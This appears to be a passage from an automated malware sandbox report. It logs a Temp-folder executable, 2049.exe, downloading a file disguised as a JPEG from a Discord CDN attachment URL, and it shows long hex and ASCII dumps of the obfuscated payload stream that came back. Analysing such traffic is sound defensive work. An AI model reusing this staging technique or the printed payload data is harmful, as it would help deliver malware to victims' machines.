                                                                                                                          Data Ascii: O O XD O MM O DW O Xq O qqM O EO O EJ O MO O XX O XJ O DX O qOO O XX O Em O qJq O MO O XE O Wp O mX O XW O EJ O Em O qqX O XM O WO O XD O qJJ O MM O mX O qOX O qOE O DW O EO O MM O DD O XJ O WO O XD O mX O XJ O XE O Wp O WO O ME O XX O Em O qqX O MX O qOM
                                                                                                                          2021-10-29 15:06:43 UTC931INData Raw: 20 44 44 20 4f 20 58 57 20 4f 20 71 4f 4d 20 4f 20 58 44 20 4f 20 71 71 4f 20 4f 20 58 71 20 4f 20 57 4f 20 4f 20 71 4a 4f 20 4f 20 71 71 58 20 4f 20 4d 4d 20 4f 20 57 4f 20 4f 20 58 44 20 4f 20 45 44 20 4f 20 4d 4f 20 4f 20 58 58 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 71 71 6d 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 58 4f 20 4f 20 4d 4d 20 4f 20 45 71 20 4f 20 58 44 20 4f 20 71 71 45 20 4f 20 58 57 20 4f 20 45 4a 20 4f 20 45 6d 20 4f 20 71 71 58 20 4f 20 58 4d 20 4f 20 57 4f 20 4f 20 58 44 20 4f 20 71 4a 4a 20 4f 20 4d 4d 20 4f 20 6d 4d 20 4f 20 58 4a 20 4f 20 71 71 58 20 4f 20 4d 45 20 4f 20 57 4f 20 4f 20 58 44 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 44 57 20 4f 20 71 4f 58 20 4f 20 45 6d 20 4f 20 71 4f
                                                                                                                          Data Ascii: DD O XW O qOM O XD O qqO O Xq O WO O qJO O qqX O MM O WO O XD O ED O MO O XX O qOE O DW O qqm O DW O EO O XO O MM O Eq O XD O qqE O XW O EJ O Em O qqX O XM O WO O XD O qJJ O MM O mM O XJ O qqX O ME O WO O XD O qqE O DW O DW O DW O EO O DW O qOX O Em O qO
                                                                                                                          2021-10-29 15:06:43 UTC947INData Raw: 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 70 20 4f 20 45 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 58 71 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 71 4f 70 20 4f 20 45 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20
                                                                                                                          Data Ascii: O DW O DW O Eq O qOp O Eq O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O Xq O DW O DW O DW O DW O DW O DW O DW O DM O DW O DE O Xq O Xq O DW O DW O EJ O qOp O Eq O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O
                                                                                                                          2021-10-29 15:06:43 UTC963INData Raw: 4f 20 71 4f 4d 20 4f 20 6d 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 71 4f 4d 20 4f 20 6d 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 71 4f 4d 20 4f 20 6d 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 71 4f 4d 20 4f 20 6d 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 71 4f 4d 20 4f 20 6d 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 71 4f 4d 20 4f 20 6d 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 71 4f 4d 20 4f 20 6d 4d 20 4f 20 6d 45 20 4f 20 57 57 20 4f 20 45 71 20 4f 20 71 71 4f 20 4f 20 71 4f 4d 20 4f 20 71 4f 4d 20 4f 20 45 6d 20 4f 20 58 58 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 57 4f 20 4f 20 45 45 20 4f 20 71 71 4f 20 4f 20 44 4d 20 4f 20 6d 45 20 4f 20 71 71 58 20 4f 20 57
                                                                                                                          Data Ascii: O qOM O mM O mE O WE O qOM O mM O mE O WE O qOM O mM O mE O WE O qOM O mM O mE O WE O qOM O mM O mE O WE O qOM O mM O mE O WE O qOM O mM O mE O WW O Eq O qqO O qOM O qOM O Em O XX O DW O DW O DW O DW O DW O DW O DW O DW O WO O EE O qqO O DM O mE O qqX O W
                                                                                                                          2021-10-29 15:06:43 UTC979INData Raw: 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 58 20 4f 20 57 71 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 4d 58 20 4f 20 71 71 6d 20 4f 20 71 71 4f 20 4f 20 71 4f 4d 20 4f 20 58 44 20 4f 20 58 4d 20 4f 20 6d 58 20 4f 20 45 70 20 4f 20 71 4a 4f 20 4f 20 71 4f 4f 20 4f 20 71 71 58 20 4f 20 58 4d 20 4f 20 45 4f 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 57 4a 20 4f 20 71 71 44 20 4f 20 58 4f 20 4f 20 44 4d 20 4f 20 71 4f 70 20 4f 20 45 70 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 57 4a 20 4f 20 45 4d 20 4f 20 71 4f 44 20 4f 20 71 71 4d 20
                                                                                                                          Data Ascii: mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O qqX O Wq O mE O mE O MX O qqm O qqO O qOM O XD O XM O mX O Ep O qJO O qOO O qqX O XM O EO O qOM O DW O DW O DW O DW O DW O DW O DW O DW O WJ O qqD O XO O DM O qOp O Ep O DE O DW O WJ O EM O qOD O qqM
                                                                                                                          2021-10-29 15:06:43 UTC995INData Raw: 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 4f 71 20 4f 20 45 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 4f 20 4f 20 71 4f 45 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 58 57 20 4f 20 58 57 20 4f 20 57 70 20 4f 20 44 45 20 4f 20 71 4a 4f 20 4f 20 45 4f 20 4f 20 45 45 20 4f 20 45 4d 20 4f 20 71 4f 70 20 4f 20 4d 4d 20 4f 20 58 6d 20 4f 20 58 6d 20 4f 20 44 58 20 4f 20 71 71 71 20 4f 20 45 4a 20 4f 20 44 4d 20 4f 20 6d 58 20 4f 20 71 71 4d 20
                                                                                                                          Data Ascii: DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DM O qOq O EM O DW O DW O Eq O XO O qOE O MM O DW O DX O XW O XW O Wp O DE O qJO O EO O EE O EM O qOp O MM O Xm O Xm O DX O qqq O EJ O DM O mX O qqM


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          1192.168.2.749812162.159.129.233443C:\Users\user\AppData\Local\Temp\2049.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2021-10-29 15:06:43 UTC1000OUTGET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1
                                                                                                                          Host: cdn.discordapp.com
                                                                                                                          2021-10-29 15:06:43 UTC1001INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:43 GMT
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 257637
                                                                                                                          Connection: close
                                                                                                                          CF-Ray: 6a5d4f336bcf4dee-FRA
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Age: 20363
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          ETag: "3943342e1b45e890a729310467090869"
                                                                                                                          Expires: Sat, 29 Oct 2022 15:06:43 GMT
                                                                                                                          Last-Modified: Fri, 29 Oct 2021 09:26:31 GMT
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                          Cf-Bgj: h2pri
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          x-goog-generation: 1635499591484284
                                                                                                                          x-goog-hash: crc32c=wAW+lg==
                                                                                                                          x-goog-hash: md5=OUM0LhtF6JCnKTEEZwkIaQ==
                                                                                                                          x-goog-metageneration: 1
                                                                                                                          x-goog-storage-class: STANDARD
                                                                                                                          x-goog-stored-content-encoding: identity
                                                                                                                          x-goog-stored-content-length: 257637
                                                                                                                          X-GUploader-UploadID: ADPycdsh_0GH4h67GfM4DXv45AAKX5J9KadQOaoJgeenVA8XggFohgRrUig2qws-RHRUWddueA29G7svcIC2IfMWyq3dEjwegQ
                                                                                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RFiH3eywxuDBEH36G3MD40GZkCj5RLdDn2kL0ELlz08PUi2mygB7%2B2P6iK7P3POeV7%2BC8Wcruxl%2B94NT1WSkfYLT9IFsqwnMKyq37OqOMxel%2Bh9mjEcMExO3He9ivWPsymV3dA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          2021-10-29 15:06:43 UTC1002INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                          Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                          2021-10-29 15:06:43 UTC1002INData Raw: 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71
                                                                                                                          Data Ascii: O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O q
                                                                                                                          2021-10-29 15:06:43 UTC1003INData Raw: 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 4f 20 4f 20 58 45 20 4f 20 57 4f 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 4f 44 20 4f 20 71 4f 70 20 4f 20 71 71 4d 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 58 6d 20 4f 20 44 45 20 4f 20 6d 58 20 4f 20 4d 4d 20 4f 20 6d 45 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 71 71 4f 20 4f 20 45 58 20 4f 20 71 71 58 20 4f 20 71 4f 4f 20 4f 20 71 4f 57 20 4f 20 45 4a 20 4f 20 44 4d 20 4f 20 58 4f 20 4f 20 71 71 4a 20 4f 20 44 58 20 4f 20 58 71 20 4f 20 58 57 20 4f 20 45 4a 20 4f 20 71 71 4a 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 57 4f 20 4f 20 71 4f 6d 20 4f 20 45 4a 20 4f 20 58 58 20 4f 20 71 71 4f 20 4f 20 6d 45 20 4f 20 71 71 4a 20 4f 20
                                                                                                                          Data Ascii: qOO O WW O qqM O mE O WE O XO O XE O WO O mE O mp O qOD O qOp O qqM O DX O mE O Xm O DE O mX O MM O mE O Eq O XW O qqO O EX O qqX O qOO O qOW O EJ O DM O XO O qqJ O DX O Xq O XW O EJ O qqJ O qOp O DW O DW O DW O DE O WO O qOm O EJ O XX O qqO O mE O qqJ O
                                                                                                                          2021-10-29 15:06:43 UTC1005INData Raw: 45 20 4f 20 57 70 20 4f 20 57 6d 20 4f 20 71 71 4f 20 4f 20 71 71 57 20 4f 20 58 4f 20 4f 20 57 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 4f 20 4f 20 45 4a 20 4f 20 71 4f 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 71 71 45 20 4f 20 71 71 6d 20 4f 20 71 71 70 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 71 20 4f 20 57 6d 20 4f 20 45 4d 20 4f 20 71 4f 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d
                                                                                                                          Data Ascii: E O Wp O Wm O qqO O qqW O XO O WE O qJO O qOO O EJ O qOD O mE O mE O mE O mE O mE O mE O Wm O qqE O qqm O qqp O mE O mE O qqq O Wm O EM O qOD O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O m
                                                                                                                          2021-10-29 15:06:43 UTC1006INData Raw: 4f 20 71 71 44 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 71 71 71 20 4f 20 57 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 57 4f 20 4f 20 71 4f 58 20 4f 20 71 4f 57 20 4f 20 58 71 20 4f 20 58 4f 20 4f 20 6d 70 20 4f 20 45 44 20 4f 20 58 58 20 4f 20 71 4f 4d 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 45 6d 20 4f 20 58 71 20 4f 20 57 4a 20 4f 20 58 4a 20 4f 20 71 71 4d 20 4f 20 58 71 20 4f 20 71 71 4d 20 4f 20 45 44 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 45 57 20 4f 20 71 4a 71 20 4f 20 45 4d 20 4f 20 58 4d 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 6d 45 20 4f 20 6d 45 20
                                                                                                                          Data Ascii: O qqD O qqX O mE O qqq O WJ O EE O DW O mE O WO O qOX O qOW O Xq O XO O mp O ED O XX O qOM O EJ O mE O Em O Xq O WJ O XJ O qqM O Xq O qqM O ED O DW O DX O EW O qJq O EM O XM O qqm O mE O mE O mE O mE O mE O mE O mE O Wq O mE O mE O XO O mE O WE O mE O mE
                                                                                                                          2021-10-29 15:06:43 UTC1007INData Raw: 20 4f 20 57 4a 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 45 57 20 4f 20 71 4f 57 20 4f 20 71 71 71 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 71 71 6d 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20
                                                                                                                          Data Ascii: O WJ O mE O mE O mE O mE O mE O mE O mp O EW O qOW O qqq O qqm O mE O Wm O mp O qqX O qqm O mE O mp O qqX O qqm O Wm O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O
                                                                                                                          2021-10-29 15:06:43 UTC1009INData Raw: 20 4f 20 58 4f 20 4f 20 57 45 20 4f 20 71 4f 4f 20 4f 20 58 71 20 4f 20 71 4f 57 20 4f 20 57 57 20 4f 20 6d 45 20 4f 20 45 45 20 4f 20 71 4f 57 20 4f 20 44 4d 20 4f 20 45 44 20 4f 20 6d 4d 20 4f 20 71 4f 57 20 4f 20 58 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 6d 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 57 57 20 4f 20 71 4f 4f 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 71 4f 71 20 4f 20 71 4f 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 58 45 20 4f 20 71 4a 71 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 44 58 20 4f 20 71 4a 4f 20 4f 20 4d 4d 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 71 71 58 20 4f 20 4d 58 20 4f 20 6d 45 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 4f 20 4f 20 71 71 45 20 4f 20 57 57 20 4f
                                                                                                                          Data Ascii: O XO O WE O qOO O Xq O qOW O WW O mE O EE O qOW O DM O ED O mM O qOW O XW O qOp O DW O mX O mE O mM O WW O qOO O EJ O mE O Wm O qOq O qOD O XO O mE O WE O XX O XE O qJq O XO O mE O DX O qJO O MM O EJ O mE O qqX O MX O mE O DX O mE O mp O qqO O qqE O WW O
                                                                                                                          2021-10-29 15:06:43 UTC1010INData Raw: 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f
                                                                                                                          Data Ascii: E O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O
                                                                                                                          2021-10-29 15:06:43 UTC1011INData Raw: 6d 45 20 4f 20 45 58 20 4f 20 71 4a 71 20 4f 20 71 71 57 20 4f 20 45 57 20 4f 20 57 57 20 4f 20 71 4f 44 20 4f 20 71 4f 45 20 4f 20 71 4a 4a 20 4f 20 44 44 20 4f 20 58 4d 20 4f 20 71 71 45 20 4f 20 71 4f 45 20 4f 20 71 71 4a 20 4f 20 71 71 70 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 71 4f 4a 20 4f 20 58 4d 20 4f 20 44 44 20 4f 20 57 45 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 71 71 4a 20 4f 20 57 45 20 4f 20 71 4f 4a 20 4f 20 58 4f 20 4f 20 57 45 20 4f 20 57 4a 20 4f 20 71 4f 71 20 4f 20 71 71 4f 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 71 4f 4f 20 4f 20 57 71 20 4f 20 71 71 4a 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 45 58 20 4f 20 57 71 20 4f 20 71 4f 71 20 4f 20 58 4f 20 4f 20 6d 70 20 4f 20 57 4a 20 4f 20 71 71 45 20 4f 20 57 44 20 4f 20 58
                                                                                                                          Data Ascii: mE O EX O qJq O qqW O EW O WW O qOD O qOE O qJJ O DD O XM O qqE O qOE O qqJ O qqp O EJ O mE O qOJ O XM O DD O WE O mE O Wq O qqJ O WE O qOJ O XO O WE O WJ O qOq O qqO O qqm O mE O qOO O Wq O qqJ O Wm O mE O Wq O EX O Wq O qOq O XO O mp O WJ O qqE O WD O X
                                                                                                                          2021-10-29 15:06:43 UTC1013INData Raw: 44 57 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 4f 4d 20 4f 20 57 70 20 4f 20 71 4f 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 57 70 20 4f 20 71 71 45 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 4f 4d 20 4f 20 57 70 20 4f 20 71 4f 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 57 70 20 4f 20 71 71 45 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 4f 4d 20 4f 20 57 70 20 4f 20 71 4f 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 45 20 4f 20 45 45 20
                                                                                                                          Data Ascii: DW O mE O mp O MX O qOM O DW O XO O mE O qOM O Wp O qOp O DX O mE O Wp O qqE O XM O DW O mE O mp O MX O qOM O DW O XO O mE O qOM O Wp O qOp O DX O mE O Wp O qqE O XM O DW O mE O mp O MX O qOM O DW O XO O mE O qOM O Wp O qOp O DX O mE O mE O mE O qqE O EE
                                                                                                                          2021-10-29 15:06:43 UTC1014INData Raw: 4f 20 44 57 20 4f 20 57 4f 20 4f 20 4d 58 20 4f 20 45 6d 20 4f 20 45 44 20 4f 20 45 70 20 4f 20 71 4f 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 4a 4a 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 4f 4a 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20
                                                                                                                          Data Ascii: O DW O WO O MX O Em O ED O Ep O qOD O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O WE O mE O mE O qJJ O mE O mE O qOJ O mE O WD O mE O mE O qqm O mE O mp O
                                                                                                                          2021-10-29 15:06:43 UTC1015INData Raw: 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57
                                                                                                                          Data Ascii: O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O W
